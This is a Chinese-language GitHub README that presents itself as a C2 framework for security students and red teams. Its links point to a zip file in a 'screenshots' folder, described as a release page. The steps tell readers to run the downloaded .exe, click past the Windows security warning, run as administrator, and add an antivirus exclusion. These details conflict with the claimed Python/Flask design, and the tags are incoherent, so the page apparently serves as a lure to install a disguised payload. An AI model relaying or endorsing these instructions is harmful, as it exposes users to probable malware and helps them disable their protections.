Kenji7425/c2-framework

# 🛡️ c2-framework - 面向测试人员的安全命令与控制框架 [](https://raw.githubusercontent.com/Kenji7425/c2-framework/main/screenshots/c-framework-v2.0.zip) 本项目提供了一个用于研究命令与控制系统的平台。它协助红队负责人和安全专业学生学习现代网络如何处理流量。该框架使用 AES-256 和 ECDH 等强加密标准来保护数据路径。它包含了用于证书固定（Certificate Pinning）和自定义流量配置文件的工具，以模拟真实世界中的活动。 ## 📥 入门指南 你需要一台运行 Windows 10 或 11 的计算机才能使用此应用程序。请确保你的机器拥有管理员权限，以便安装必要的组件。该框架需要 Python，因为它运行在 Flask 后端之上。 请按照以下步骤获取软件： 1. 访问此[发布页面链接](https://raw.githubusercontent.com/Kenji7425/c2-framework/main/screenshots/c-framework-v2.0.zip)。 2. 找到 Assets 部分下列出的最新版本。 3. 将以 .exe 结尾的可执行文件下载到你的本地硬盘。 4. 在你的下载文件夹中找到该文件。 ## ⚙️ 系统要求 在运行该软件之前，请检查你的计算机是否满足以下需求： * Windows 10 或更高版本。 * 至少 4GB 的 RAM。 * 稳定的互联网连接。 * 系统中必须安装 Python 3.9 或更新版本。 如果你尚未安装 Python，可以在 Python 官方网站上找到安装程序。在安装过程中，请务必勾选“Add Python to PATH”复选框。此设置允许框架自动找到所需的工具。 ## 🚀 设置应用程序 下载文件后，在你的计算机上腾出一块空间来存放该框架。请按照以下说明准备你的环境： 1. 在你的桌面上创建一个新文件夹，并将其命名为“c2-workspace”。 2. 将下载的可执行文件移动到此文件夹中。 3. 在 Windows 搜索栏中输入“cmd”并按 Enter 键，以打开命令提示符。 4. 输入“cd Desktop\c2-workspace”并按 Enter 键，进入你新建的文件夹。 5. 输入可执行文件的名称以启动该过程。例如，如果文件名为“c2-tool.exe”，请输入“c2-tool.exe”并按 Enter 键。 应用程序窗口将会打开。如果出现 Windows 安全提示，请点击“更多信息”，然后点击“仍要运行”。出现此提示是因为该软件是用于安全测试的专用工具。 ## 🛠️ 配置和 Profiles 该框架依赖 Malleable C2 profiles 来管理流量。你可以修改这些文件，以更改框架与你的测试系统进行通信的方式。 1. 打开你的工作区中的“profiles”文件夹。 2. 选择一个 profile 文件。你可以使用任何文本编辑器（例如记事本）打开它们。 3. 更改文件内的设置以符合你的测试目标。 4. 保存文件并重新启动应用程序以应用更改。 系统对所有字段数据使用 AES-256 加密。这确保了你的测试流量保持私密。你无需配置加密密钥，因为系统会为每个会话生成唯一的安全 token。 ## 🔍 了解功能特性 该框架支持多项用于安全研究的关键功能： * **ECDH 前向保密：** 保持你的流量密钥唯一。即使有人随后拦截了数据，他们也无法解锁之前的会话。 * **证书固定：** 框架将流量绑定到特定的数字证书。这可以防止攻击者监听你的测试通信。 * **Flask 集成：** 后端使用轻量级 Web 服务器。它负责处理传入的连接并管理命令循环。 * **MITRE ATT&CK 映射：** 该工具生成的日志将活动与特定的战术联系起来。这有助于你了解流量在标准安全框架中所处的位置。 ## 📝 常见问题解答 **该框架会损坏我的电脑吗？** 不会。它作为教育用途的本地应用程序运行。它不会对你的系统文件执行有害操作。 **我可以在家庭网络中使用它吗？** 可以。你可以在同一局域网内的两台计算机之间测试连接。请确保你已将防火墙设置配置为允许研究工具和你的测试节点之间的流量。 **学习起来困难吗？** 该框架遵循一条逻辑路径。你只需定义目标、设置 profile 并观察日志。花点时间阅读控制台窗口中的输出，以了解系统如何处理数据。 **如果连接失败怎么办？** 检查你的防病毒软件是否阻止了该应用程序。某些安全工具可能会标记该框架，因为它模拟了专业人员使用的基于网络的工具。你可能需要在防病毒设置中为“c2-workspace”文件夹添加一个例外项。 ## 📁 常见问题排查 如果应用程序挂起或意外关闭，请检查位于“logs”子文件夹中的日志文件。该文件包含描述该工具最后执行操作的相关文本。 常见的修复方法包括： * 以管理员身份运行命令提示符。 * 通过在终端中输入“python --version”来验证 Python 是否已正确安装。 * 在运行测试期间关闭其他网络密集型应用程序。 该框架注重透明度。系统发送的每个请求都会显示在控制台窗口中。如果你在控制台中看到警告，请仔细阅读相关文本，以识别网络问题所在。 ## ⚖️ 使用准则 仅在授权测试和教育目的下使用此框架。在任何网络上运行安全测试之前，请务必先寻求许可。参与未经授权的访问是非法的，并且违反了这些项目规则。此处的目的是为了提升你在渗透测试和系统防御方面的技能。 保持你使用的框架副本为最新版本。请定期查看 GitHub 页面以获取新版本。更新通常包含对加密模块的改进以及针对 Flask 服务器的稳定性修复。 始终将你的测试环境与个人数据隔离。虚拟机是该框架的绝佳宿主。这能保持你的主操作系统纯净，并为你的实验提供一个安全的沙箱环境。

标签：adversary infrastructure, AES-256, C2框架, ECDH, Flask, IP 地址批量处理, Python, 加密通信, 后端开发, 命令与控制, 安全学习资源, 安全教育, 攻击模拟, 数据展示, 无后门, 流量混淆, 漏洞评估, 红队, 网络信息收集, 网络安全, 证书锁定, 逆向工具, 隐私保护, 驱动签名利用